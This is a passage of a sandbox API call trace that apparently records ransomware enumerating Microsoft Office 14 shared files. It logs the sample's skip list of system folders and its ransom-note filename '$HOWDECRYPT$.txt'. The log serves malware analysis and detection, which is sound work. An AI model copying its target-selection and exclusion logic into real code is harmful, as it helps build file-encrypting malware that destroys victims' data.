(lpString1="ACEREP.DLL", lpString2="System Volume Information") returned -1 [0087.455] lstrlenW (lpString="System Volume Information") returned 25 [0087.455] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 70 [0087.455] StrStrIW (lpFirst="ACEREP.DLL", lpSrch=".spyhunter") returned 0x0 [0087.455] lstrcmpW (lpString1="ACEREP.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.455] lstrcmpW (lpString1="ACEREP.DLL", lpString2="_uninstalling_.png") returned 1 [0087.455] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 70 [0087.455] GetProcessHeap () returned 0x2c0000 [0087.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x33fd80 [0087.455] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9e0) returned 0x3867e8 [0087.455] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.455] lstrcmpiW (lpString1="ACETXT.DLL", lpString2="Windows") returned -1 [0087.455] lstrlenW (lpString="Windows") returned 7 [0087.455] lstrcmpiW (lpString1="ACETXT.DLL", lpString2="$Recycle.bin") returned 1 [0087.455] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.455] lstrcmpiW (lpString1="ACETXT.DLL", lpString2="System Volume Information") returned -1 [0087.455] lstrlenW (lpString="System Volume Information") returned 25 [0087.455] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 70 [0087.455] StrStrIW (lpFirst="ACETXT.DLL", lpSrch=".spyhunter") returned 0x0 [0087.455] lstrcmpW (lpString1="ACETXT.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.455] lstrcmpW (lpString1="ACETXT.DLL", lpString2="_uninstalling_.png") returned 1 [0087.455] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 70 [0087.455] GetProcessHeap () returned 0x2c0000 [0087.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x33fe58 [0087.455] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9e8) returned 0x3867e8 [0087.455] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.455] lstrcmpiW (lpString1="ACEWDAT.DLL", lpString2="Windows") returned -1 [0087.455] lstrlenW (lpString="Windows") returned 7 [0087.455] lstrcmpiW (lpString1="ACEWDAT.DLL", lpString2="$Recycle.bin") returned 1 [0087.455] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.456] lstrcmpiW (lpString1="ACEWDAT.DLL", lpString2="System Volume Information") returned -1 [0087.456] lstrlenW (lpString="System Volume Information") returned 25 [0087.456] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 71 [0087.456] StrStrIW (lpFirst="ACEWDAT.DLL", lpSrch=".spyhunter") returned 0x0 [0087.456] lstrcmpW (lpString1="ACEWDAT.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.456] lstrcmpW (lpString1="ACEWDAT.DLL", lpString2="_uninstalling_.png") returned 1 [0087.456] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 71 [0087.456] GetProcessHeap () returned 0x2c0000 [0087.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x33ff30 [0087.456] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9f0) returned 0x3867e8 [0087.456] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.456] lstrcmpiW (lpString1="ACEWSS.DLL", lpString2="Windows") returned -1 [0087.456] lstrlenW (lpString="Windows") returned 7 [0087.456] lstrcmpiW (lpString1="ACEWSS.DLL", lpString2="$Recycle.bin") returned 1 [0087.456] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.456] lstrcmpiW (lpString1="ACEWSS.DLL", lpString2="System Volume Information") returned -1 [0087.456] lstrlenW (lpString="System Volume Information") returned 25 [0087.456] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 70 [0087.456] StrStrIW (lpFirst="ACEWSS.DLL", lpSrch=".spyhunter") returned 0x0 [0087.456] lstrcmpW (lpString1="ACEWSS.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.456] lstrcmpW (lpString1="ACEWSS.DLL", lpString2="_uninstalling_.png") returned 1 [0087.456] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 70 [0087.457] GetProcessHeap () returned 0x2c0000 [0087.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x340008 [0087.457] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9f8) returned 0x3867e8 [0087.457] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.457] lstrcmpiW (lpString1="ACEXBE.DLL", lpString2="Windows") returned -1 [0087.457] lstrlenW (lpString="Windows") returned 7 [0087.457] lstrcmpiW (lpString1="ACEXBE.DLL", lpString2="$Recycle.bin") returned 1 [0087.457] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.457] lstrcmpiW (lpString1="ACEXBE.DLL", lpString2="System Volume Information") returned -1 [0087.457] lstrlenW (lpString="System Volume Information") returned 25 [0087.457] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 70 [0087.457] StrStrIW (lpFirst="ACEXBE.DLL", lpSrch=".spyhunter") returned 0x0 [0087.457] lstrcmpW (lpString1="ACEXBE.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.457] lstrcmpW (lpString1="ACEXBE.DLL", lpString2="_uninstalling_.png") returned 1 [0087.457] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 70 [0087.457] GetProcessHeap () returned 0x2c0000 [0087.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x3400e0 [0087.457] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa00) returned 0x3867e8 [0087.457] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.457] lstrcmpiW (lpString1="ATLCONV.DLL", lpString2="Windows") returned -1 [0087.457] lstrlenW (lpString="Windows") returned 7 [0087.457] lstrcmpiW (lpString1="ATLCONV.DLL", lpString2="$Recycle.bin") returned 1 [0087.457] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.457] lstrcmpiW (lpString1="ATLCONV.DLL", lpString2="System Volume Information") returned -1 [0087.457] lstrlenW (lpString="System Volume Information") returned 25 [0087.458] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 71 [0087.458] StrStrIW (lpFirst="ATLCONV.DLL", lpSrch=".spyhunter") returned 0x0 [0087.458] lstrcmpW (lpString1="ATLCONV.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.458] lstrcmpW (lpString1="ATLCONV.DLL", lpString2="_uninstalling_.png") returned 1 [0087.458] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 71 [0087.458] GetProcessHeap () returned 0x2c0000 [0087.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x3401b8 [0087.458] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa08) returned 0x3867e8 [0087.458] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.458] lstrcmpiW (lpString1="Csi.dll", lpString2="Windows") returned -1 [0087.458] lstrlenW (lpString="Windows") returned 7 [0087.458] lstrcmpiW (lpString1="Csi.dll", lpString2="$Recycle.bin") returned 1 [0087.458] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.458] lstrcmpiW (lpString1="Csi.dll", lpString2="System Volume Information") returned -1 [0087.458] lstrlenW (lpString="System Volume Information") returned 25 [0087.458] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 67 [0087.458] StrStrIW (lpFirst="Csi.dll", lpSrch=".spyhunter") returned 0x0 [0087.458] lstrcmpW (lpString1="Csi.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.458] lstrcmpW (lpString1="Csi.dll", lpString2="_uninstalling_.png") returned 1 [0087.458] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 67 [0087.458] GetProcessHeap () returned 0x2c0000 [0087.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358540 [0087.458] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa10) returned 0x3867e8 [0087.458] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.458] lstrcmpiW (lpString1="CsiSoap.dll", lpString2="Windows") returned -1 [0087.458] lstrlenW (lpString="Windows") returned 7 [0087.459] lstrcmpiW (lpString1="CsiSoap.dll", lpString2="$Recycle.bin") returned 1 [0087.459] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.459] lstrcmpiW (lpString1="CsiSoap.dll", lpString2="System Volume Information") returned -1 [0087.459] lstrlenW (lpString="System Volume Information") returned 25 [0087.459] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 71 [0087.459] StrStrIW (lpFirst="CsiSoap.dll", lpSrch=".spyhunter") returned 0x0 [0087.459] lstrcmpW (lpString1="CsiSoap.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.459] lstrcmpW (lpString1="CsiSoap.dll", lpString2="_uninstalling_.png") returned 1 [0087.459] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 71 [0087.459] GetProcessHeap () returned 0x2c0000 [0087.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x340290 [0087.459] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa18) returned 0x3867e8 [0087.459] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.459] lstrcmpiW (lpString1="Cultures", lpString2="Windows") returned -1 [0087.459] lstrlenW (lpString="Windows") returned 7 [0087.459] lstrcmpiW (lpString1="Cultures", lpString2="$Recycle.bin") returned 1 [0087.459] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.459] lstrcmpiW (lpString1="Cultures", lpString2="System Volume Information") returned -1 [0087.459] lstrlenW (lpString="System Volume Information") returned 25 [0087.459] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures") returned 68 [0087.459] lstrcmpW (lpString1="Cultures", lpString2=".") returned 1 [0087.459] lstrcmpW (lpString1="Cultures", lpString2="..") returned 1 [0087.459] GetProcessHeap () returned 0x2c0000 [0087.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0087.460] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\*") returned 70 [0087.460] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0087.461] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.461] lstrlenW (lpString="Windows") returned 7 [0087.461] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.461] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.461] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.461] lstrlenW (lpString="System Volume Information") returned 25 [0087.461] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\.") returned 70 [0087.461] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.461] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.461] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.461] lstrlenW (lpString="Windows") returned 7 [0087.461] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.461] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.461] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.461] lstrlenW (lpString="System Volume Information") returned 25 [0087.461] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\..") returned 71 [0087.461] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.461] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.461] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.461] lstrcmpiW (lpString1="OFFICE.ODF", lpString2="Windows") returned -1 [0087.462] lstrlenW (lpString="Windows") returned 7 [0087.462] lstrcmpiW (lpString1="OFFICE.ODF", lpString2="$Recycle.bin") returned 1 [0087.462] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.462] lstrcmpiW (lpString1="OFFICE.ODF", lpString2="System Volume Information") returned -1 [0087.462] lstrlenW (lpString="System Volume Information") returned 25 [0087.462] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 79 [0087.462] StrStrIW (lpFirst="OFFICE.ODF", lpSrch=".spyhunter") returned 0x0 [0087.462] lstrcmpW (lpString1="OFFICE.ODF", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.462] lstrcmpW (lpString1="OFFICE.ODF", lpString2="_uninstalling_.png") returned 1 [0087.462] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 79 [0087.462] GetProcessHeap () returned 0x2c0000 [0087.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x374300 [0087.462] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa20) returned 0x3867e8 [0087.462] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.462] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.462] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\$HOWDECRYPT$.txt") returned 85 [0087.462] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\$HOWDECRYPT$.txt") returned 85 [0087.462] GetProcessHeap () returned 0x2c0000 [0087.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x354430 [0087.462] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa28) returned 0x3867e8 [0087.462] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.462] lstrcmpiW (lpString1="EXPSRV.DLL", lpString2="Windows") returned -1 [0087.462] lstrlenW (lpString="Windows") returned 7 [0087.463] lstrcmpiW (lpString1="EXPSRV.DLL", lpString2="$Recycle.bin") returned 1 [0087.463] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.463] lstrcmpiW (lpString1="EXPSRV.DLL", lpString2="System Volume Information") returned -1 [0087.463] lstrlenW (lpString="System Volume Information") returned 25 [0087.463] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 70 [0087.463] StrStrIW (lpFirst="EXPSRV.DLL", lpSrch=".spyhunter") returned 0x0 [0087.463] lstrcmpW (lpString1="EXPSRV.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.463] lstrcmpW (lpString1="EXPSRV.DLL", lpString2="_uninstalling_.png") returned 1 [0087.463] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXPSRV.DLL") returned 70 [0087.463] GetProcessHeap () returned 0x2c0000 [0087.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x340368 [0087.463] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa30) returned 0x3867e8 [0087.463] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.463] lstrcmpiW (lpString1="EXP_PDF.DLL", lpString2="Windows") returned -1 [0087.463] lstrlenW (lpString="Windows") returned 7 [0087.463] lstrcmpiW (lpString1="EXP_PDF.DLL", lpString2="$Recycle.bin") returned 1 [0087.463] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.463] lstrcmpiW (lpString1="EXP_PDF.DLL", lpString2="System Volume Information") returned -1 [0087.463] lstrlenW (lpString="System Volume Information") returned 25 [0087.463] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 71 [0087.463] StrStrIW (lpFirst="EXP_PDF.DLL", lpSrch=".spyhunter") returned 0x0 [0087.463] lstrcmpW (lpString1="EXP_PDF.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.463] lstrcmpW (lpString1="EXP_PDF.DLL", lpString2="_uninstalling_.png") returned 1 [0087.463] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_PDF.DLL") returned 71 [0087.463] GetProcessHeap () returned 0x2c0000 [0087.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x340440 [0087.463] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa38) returned 0x3867e8 [0087.463] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.463] lstrcmpiW (lpString1="EXP_XPS.DLL", lpString2="Windows") returned -1 [0087.463] lstrlenW (lpString="Windows") returned 7 [0087.464] lstrcmpiW (lpString1="EXP_XPS.DLL", lpString2="$Recycle.bin") returned 1 [0087.464] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.464] lstrcmpiW (lpString1="EXP_XPS.DLL", lpString2="System Volume Information") returned -1 [0087.464] lstrlenW (lpString="System Volume Information") returned 25 [0087.464] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL") returned 71 [0087.464] StrStrIW (lpFirst="EXP_XPS.DLL", lpSrch=".spyhunter") returned 0x0 [0087.464] lstrcmpW (lpString1="EXP_XPS.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.464] lstrcmpW (lpString1="EXP_XPS.DLL", lpString2="_uninstalling_.png") returned 1 [0087.464] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL") returned 71 [0087.464] GetProcessHeap () returned 0x2c0000 [0087.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x340518 [0087.464] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa40) returned 0x3867e8 [0087.464] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.464] lstrcmpiW (lpString1="FLTLDR.EXE", lpString2="Windows") returned -1 [0087.464] lstrlenW (lpString="Windows") returned 7 [0087.464] lstrcmpiW (lpString1="FLTLDR.EXE", lpString2="$Recycle.bin") returned 1 [0087.464] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.464] lstrcmpiW (lpString1="FLTLDR.EXE", lpString2="System Volume Information") returned -1 [0087.464] lstrlenW (lpString="System Volume Information") returned 25 [0087.464] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 70 [0087.464] StrStrIW (lpFirst="FLTLDR.EXE", lpSrch=".spyhunter") returned 0x0 [0087.464] lstrcmpW (lpString1="FLTLDR.EXE", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.464] lstrcmpW (lpString1="FLTLDR.EXE", lpString2="_uninstalling_.png") returned 1 [0087.464] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\FLTLDR.EXE") returned 70 [0087.464] GetProcessHeap () returned 0x2c0000 [0087.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x3405f0 [0087.464] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa48) returned 0x3867e8 [0087.464] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.465] lstrcmpiW (lpString1="IACOM2.DLL", lpString2="Windows") returned -1 [0087.466] lstrlenW (lpString="Windows") returned 7 [0087.466] lstrcmpiW (lpString1="IACOM2.DLL", lpString2="$Recycle.bin") returned 1 [0087.466] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.466] lstrcmpiW (lpString1="IACOM2.DLL", lpString2="System Volume Information") returned -1 [0087.466] lstrlenW (lpString="System Volume Information") returned 25 [0087.466] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 70 [0087.466] StrStrIW (lpFirst="IACOM2.DLL", lpSrch=".spyhunter") returned 0x0 [0087.466] lstrcmpW (lpString1="IACOM2.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.466] lstrcmpW (lpString1="IACOM2.DLL", lpString2="_uninstalling_.png") returned 1 [0087.466] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL") returned 70 [0087.466] GetProcessHeap () returned 0x2c0000 [0087.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x3406c8 [0087.467] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa50) returned 0x3867e8 [0087.467] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.467] lstrcmpiW (lpString1="LICLUA.EXE", lpString2="Windows") returned -1 [0087.467] lstrlenW (lpString="Windows") returned 7 [0087.467] lstrcmpiW (lpString1="LICLUA.EXE", lpString2="$Recycle.bin") returned 1 [0087.467] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.467] lstrcmpiW (lpString1="LICLUA.EXE", lpString2="System Volume Information") returned -1 [0087.467] lstrlenW (lpString="System Volume Information") returned 25 [0087.467] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 70 [0087.467] StrStrIW (lpFirst="LICLUA.EXE", lpSrch=".spyhunter") returned 0x0 [0087.467] lstrcmpW (lpString1="LICLUA.EXE", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.467] lstrcmpW (lpString1="LICLUA.EXE", lpString2="_uninstalling_.png") returned 1 [0087.467] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\LICLUA.EXE") returned 70 [0087.467] GetProcessHeap () returned 0x2c0000 [0087.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x3407a0 [0087.467] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa58) returned 0x3867e8 [0087.467] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.467] lstrcmpiW (lpString1="MSO.DLL", lpString2="Windows") returned -1 [0087.467] lstrlenW (lpString="Windows") returned 7 [0087.467] lstrcmpiW (lpString1="MSO.DLL", lpString2="$Recycle.bin") returned 1 [0087.467] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.467] lstrcmpiW (lpString1="MSO.DLL", lpString2="System Volume Information") returned -1 [0087.467] lstrlenW (lpString="System Volume Information") returned 25 [0087.467] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 67 [0087.468] StrStrIW (lpFirst="MSO.DLL", lpSrch=".spyhunter") returned 0x0 [0087.468] lstrcmpW (lpString1="MSO.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.468] lstrcmpW (lpString1="MSO.DLL", lpString2="_uninstalling_.png") returned 1 [0087.468] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL") returned 67 [0087.468] GetProcessHeap () returned 0x2c0000 [0087.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358470 [0087.468] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa60) returned 0x3867e8 [0087.468] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.468] lstrcmpiW (lpString1="MSOICONS.EXE", lpString2="Windows") returned -1 [0087.468] lstrlenW (lpString="Windows") returned 7 [0087.468] lstrcmpiW (lpString1="MSOICONS.EXE", lpString2="$Recycle.bin") returned 1 [0087.468] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.468] lstrcmpiW (lpString1="MSOICONS.EXE", lpString2="System Volume Information") returned -1 [0087.468] lstrlenW (lpString="System Volume Information") returned 25 [0087.468] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 72 [0087.468] StrStrIW (lpFirst="MSOICONS.EXE", lpSrch=".spyhunter") returned 0x0 [0087.468] lstrcmpW (lpString1="MSOICONS.EXE", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.468] lstrcmpW (lpString1="MSOICONS.EXE", lpString2="_uninstalling_.png") returned 1 [0087.468] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE") returned 72 [0087.468] GetProcessHeap () returned 0x2c0000 [0087.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 